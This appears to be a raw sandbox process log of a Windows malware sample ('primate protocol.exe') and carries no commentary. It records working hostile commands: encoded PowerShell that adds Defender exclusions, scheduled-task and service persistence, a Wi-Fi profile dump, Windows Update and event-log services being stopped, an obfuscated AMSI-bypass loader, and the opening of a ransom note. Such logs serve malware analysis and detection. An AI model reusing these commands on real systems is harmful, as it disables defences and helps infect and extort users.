C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\primate protocol.exe

"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\systemprocess.exe

"C:\Windows\systemprocess.exe"

C:\Windows\host.exe

"C:\Windows\host.exe"

C:\Windows\CompPkg.exe

"C:\Windows\CompPkg.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\netsh.exe

"netsh" wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "PROCESS HOST"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OdjsqXVEoMxo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yfmVlGOStjgHBO,[Parameter(Position=1)][Type]$UJRGIblVoq)$hIprbDofzkL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$hIprbDofzkL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yfmVlGOStjgHBO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$hIprbDofzkL.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UJRGIblVoq,$yfmVlGOStjgHBO).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $hIprbDofzkL.CreateType();}$vyVsTzFyMRkLJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$bYPnAmzEfuscSx=$vyVsTzFyMRkLJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDRpFjDocdPWEvpSmDG=OdjsqXVEoMxo @([String])([IntPtr]);$nfWTHpcRSoEqqeFdfiOtpn=OdjsqXVEoMxo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wEXXhkFtbyb=$vyVsTzFyMRkLJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oleLiZxwkOLAwO=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$PiJGUFQYEknHQZPKx=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$HEIoPYX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oleLiZxwkOLAwO,$ZDRpFjDocdPWEvpSmDG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uXiOiPrfOfLHHnfYI=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$HEIoPYX,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zhrGrazrmt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,4,[ref]$zhrGrazrmt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXiOiPrfOfLHHnfYI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,0x20,[ref]$zhrGrazrmt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "PROCESS HOST"

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Users\Admin\AppData\Roaming\CompPkg.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

